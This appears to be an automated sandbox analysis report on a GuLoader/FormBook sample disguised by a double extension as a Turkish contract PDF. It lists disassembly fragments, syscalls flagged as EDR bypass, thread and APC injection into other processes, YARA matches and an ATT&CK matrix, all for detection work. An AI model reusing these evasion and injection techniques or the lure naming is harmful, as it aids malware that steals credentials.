        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB2755 mov ecx, dword ptr fs:[00000030h]2_2_32BB2755
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB2755 mov eax, dword ptr fs:[00000030h]2_2_32BB2755
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB2755 mov eax, dword ptr fs:[00000030h]2_2_32BB2755
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC174A mov eax, dword ptr fs:[00000030h]2_2_32BC174A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC3740 mov eax, dword ptr fs:[00000030h]2_2_32BC3740
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE4BC mov eax, dword ptr fs:[00000030h]2_2_32BCE4BC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC44A8 mov eax, dword ptr fs:[00000030h]2_2_32BC44A8
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B924A2 mov eax, dword ptr fs:[00000030h]2_2_32B924A2
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B924A2 mov ecx, dword ptr fs:[00000030h]2_2_32B924A2
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCB490 mov eax, dword ptr fs:[00000030h]2_2_32BCB490
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCB490 mov eax, dword ptr fs:[00000030h]2_2_32BCB490
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC648A mov eax, dword ptr fs:[00000030h]2_2_32BC648A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC648A mov eax, dword ptr fs:[00000030h]2_2_32BC648A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC648A mov eax, dword ptr fs:[00000030h]2_2_32BC648A
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F4FD mov eax, dword ptr fs:[00000030h]2_2_32C4F4FD
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B90485 mov ecx, dword ptr fs:[00000030h]2_2_32B90485
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB94FA mov eax, dword ptr fs:[00000030h]2_2_32BB94FA
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B964F0 mov eax, dword ptr fs:[00000030h]2_2_32B964F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCA4F0 mov eax, dword ptr fs:[00000030h]2_2_32BCA4F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCA4F0 mov eax, dword ptr fs:[00000030h]2_2_32BCA4F0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1C490 mov eax, dword ptr fs:[00000030h]2_2_32C1C490
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE4EF mov eax, dword ptr fs:[00000030h]2_2_32BCE4EF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCE4EF mov eax, dword ptr fs:[00000030h]2_2_32BCE4EF
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC54E0 mov eax, dword ptr fs:[00000030h]2_2_32BC54E0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1D4A0 mov ecx, dword ptr fs:[00000030h]2_2_32C1D4A0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1D4A0 mov eax, dword ptr fs:[00000030h]2_2_32C1D4A0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1D4A0 mov eax, dword ptr fs:[00000030h]2_2_32C1D4A0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB44D1 mov eax, dword ptr fs:[00000030h]2_2_32BB44D1
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB44D1 mov eax, dword ptr fs:[00000030h]2_2_32BB44D1
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF4D0 mov eax, dword ptr fs:[00000030h]2_2_32BBF4D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF4D0 mov eax, dword ptr fs:[00000030h]2_2_32BBF4D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF4D0 mov eax, dword ptr fs:[00000030h]2_2_32BBF4D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF4D0 mov eax, dword ptr fs:[00000030h]2_2_32BBF4D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF4D0 mov eax, dword ptr fs:[00000030h]2_2_32BBF4D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF4D0 mov eax, dword ptr fs:[00000030h]2_2_32BBF4D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF4D0 mov eax, dword ptr fs:[00000030h]2_2_32BBF4D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF4D0 mov eax, dword ptr fs:[00000030h]2_2_32BBF4D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBF4D0 mov eax, dword ptr fs:[00000030h]2_2_32BBF4D0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB14C9 mov eax, dword ptr fs:[00000030h]2_2_32BB14C9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB14C9 mov eax, dword ptr fs:[00000030h]2_2_32BB14C9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB14C9 mov eax, dword ptr fs:[00000030h]2_2_32BB14C9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB14C9 mov eax, dword ptr fs:[00000030h]2_2_32BB14C9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BB14C9 mov eax, dword ptr fs:[00000030h]2_2_32BB14C9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8B420 mov eax, dword ptr fs:[00000030h]2_2_32B8B420
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC7425 mov eax, dword ptr fs:[00000030h]2_2_32BC7425
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC7425 mov ecx, dword ptr fs:[00000030h]2_2_32BC7425
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C5A464 mov eax, dword ptr fs:[00000030h]2_2_32C5A464
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B8640D mov eax, dword ptr fs:[00000030h]2_2_32B8640D
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F478 mov eax, dword ptr fs:[00000030h]2_2_32C4F478
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C26400 mov eax, dword ptr fs:[00000030h]2_2_32C26400
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C26400 mov eax, dword ptr fs:[00000030h]2_2_32C26400
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B98470 mov eax, dword ptr fs:[00000030h]2_2_32B98470
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B98470 mov eax, dword ptr fs:[00000030h]2_2_32B98470
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F409 mov eax, dword ptr fs:[00000030h]2_2_32C4F409
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBE45E mov eax, dword ptr fs:[00000030h]2_2_32BBE45E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBE45E mov eax, dword ptr fs:[00000030h]2_2_32BBE45E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBE45E mov eax, dword ptr fs:[00000030h]2_2_32BBE45E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBE45E mov eax, dword ptr fs:[00000030h]2_2_32BBE45E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BBE45E mov eax, dword ptr fs:[00000030h]2_2_32BBE45E
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C19429 mov eax, dword ptr fs:[00000030h]2_2_32C19429
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCD450 mov eax, dword ptr fs:[00000030h]2_2_32BCD450
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCD450 mov eax, dword ptr fs:[00000030h]2_2_32BCD450
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9D454 mov eax, dword ptr fs:[00000030h]2_2_32B9D454
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9D454 mov eax, dword ptr fs:[00000030h]2_2_32B9D454
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9D454 mov eax, dword ptr fs:[00000030h]2_2_32B9D454
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9D454 mov eax, dword ptr fs:[00000030h]2_2_32B9D454
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9D454 mov eax, dword ptr fs:[00000030h]2_2_32B9D454
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B9D454 mov eax, dword ptr fs:[00000030h]2_2_32B9D454
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1F42F mov eax, dword ptr fs:[00000030h]2_2_32C1F42F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1F42F mov eax, dword ptr fs:[00000030h]2_2_32C1F42F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1F42F mov eax, dword ptr fs:[00000030h]2_2_32C1F42F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1F42F mov eax, dword ptr fs:[00000030h]2_2_32C1F42F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1F42F mov eax, dword ptr fs:[00000030h]2_2_32C1F42F
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0445 mov eax, dword ptr fs:[00000030h]2_2_32BA0445
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0445 mov eax, dword ptr fs:[00000030h]2_2_32BA0445
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0445 mov eax, dword ptr fs:[00000030h]2_2_32BA0445
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0445 mov eax, dword ptr fs:[00000030h]2_2_32BA0445
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0445 mov eax, dword ptr fs:[00000030h]2_2_32BA0445
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BA0445 mov eax, dword ptr fs:[00000030h]2_2_32BA0445
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C105C6 mov eax, dword ptr fs:[00000030h]2_2_32C105C6
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B945B0 mov eax, dword ptr fs:[00000030h]2_2_32B945B0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32B945B0 mov eax, dword ptr fs:[00000030h]2_2_32B945B0
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC2594 mov eax, dword ptr fs:[00000030h]2_2_32BC2594
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCA580 mov eax, dword ptr fs:[00000030h]2_2_32BCA580
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BCA580 mov eax, dword ptr fs:[00000030h]2_2_32BCA580
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC9580 mov eax, dword ptr fs:[00000030h]2_2_32BC9580
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC9580 mov eax, dword ptr fs:[00000030h]2_2_32BC9580
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C1C5FC mov eax, dword ptr fs:[00000030h]2_2_32C1C5FC
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C4F582 mov eax, dword ptr fs:[00000030h]2_2_32C4F582
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E588 mov eax, dword ptr fs:[00000030h]2_2_32C0E588
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32C0E588 mov eax, dword ptr fs:[00000030h]2_2_32C0E588
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 2_2_32BC15EF mov eax, dword ptr fs:[00000030h]2_2_32BC15EF

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Found direct / indirect Syscall (likely to bypass EDR)
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeNtSetContextThread: Indirect: 0x328A3810Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtClose: Direct from: 0x7FF817339E7F
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x7FF84D6E2651Jump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeNtResumeThread: Indirect: 0x328A3E30Jump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeNtSuspendThread: Indirect: 0x328A3B20Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x46CCECBJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x46C519EJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtResumeThread: Direct from: 0x46C53E4Jump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeNtQueueApcThread: Indirect: 0x3289F58AJump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtDelayExecution: Direct from: 0x46C536DJump to behavior
        Maps a DLL or memory area into another process
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeSection loaded: NULL target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: read writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
        Modifies the context of a thread in another process (thread injection)
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeThread register set: target process: 7596Jump to behavior
        Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 7596Jump to behavior
        Queues an APC in another process (thread injection)
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeThread APC queued: target process: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeJump to behavior
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeProcess created: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe "C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe"Jump to behavior
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe "C:\Windows\SysWOW64\ipconfig.exe"Jump to behavior
        Source: RAVCpl64.exe, 00000003.00000000.23551795328.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.28284011322.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.25105697548.00000000044F0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: RAVCpl64.exe, 00000003.00000000.23551795328.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.28284011322.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.25103196585.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
        Source: RAVCpl64.exe, 00000003.00000000.23551795328.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.28284011322.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.25103196585.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
        Source: explorer.exe, 00000005.00000000.25102736177.0000000000699000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000002.28282571129.0000000000699000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progmani
        Source: RAVCpl64.exe, 00000003.00000000.23551795328.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, RAVCpl64.exe, 00000003.00000002.28284011322.0000000000F00000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.25103196585.0000000000E61000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager9
        Source: C:\Users\user\Desktop\D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exeCode function: 0_2_004034FC EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrlenW,LdrInitializeThunk,wsprintfW,GetFileAttributesW,DeleteFileW,LdrInitializeThunk,SetCurrentDirectoryW,LdrInitializeThunk,CopyFileW,OleUninitialize,ExitProcess,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004034FC

        Stealing of Sensitive Information

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.25177336762.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Remote Access Functionality

        barindex
        Yara detected FormBook
        Source: Yara matchFile source: 00000004.00000002.25177406636.0000000003410000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.23643160181.00000000328C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.25177336762.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        Mitre Att&ck Matrix

        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
        Native API        		1
        DLL Side-Loading        		1
        Access Token Manipulation        		1
        Masquerading        		OS Credential Dumping121
        Security Software Discovery        		Remote Services1
        Archive Collected Data        		11
        Encrypted Channel        		Exfiltration Over Other Network Medium1
        System Shutdown/Reboot
        CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts312
        Process Injection        		2
        Virtualization/Sandbox Evasion        		LSASS Memory2
        Virtualization/Sandbox Evasion        		Remote Desktop Protocol1
        Clipboard Data        		1
        Ingress Tool Transfer        		Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
        Abuse Elevation Control Mechanism        		1
        Access Token Manipulation        		Security Account Manager2
        Process Discovery        		SMB/Windows Admin SharesData from Network Shared Drive2
        Non-Application Layer Protocol        		Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
        DLL Side-Loading        		312
        Process Injection        		NTDS1
        Application Window Discovery        		Distributed Component Object ModelInput Capture13
        Application Layer Protocol        		Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        Deobfuscate/Decode Files or Information        		LSA Secrets1
        System Network Configuration Discovery        		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        Abuse Elevation Control Mechanism        		Cached Domain Credentials2
        File and Directory Discovery        		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
        Obfuscated Files or Information        		DCSync13
        System Information Discovery        		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        DLL Side-Loading        		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        SourceDetectionScannerLabelLink
        D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe29%ReversingLabsWin32.Trojan.Guloader

        Dropped Files

        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\nsp919B.tmp\System.dll0%ReversingLabs

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

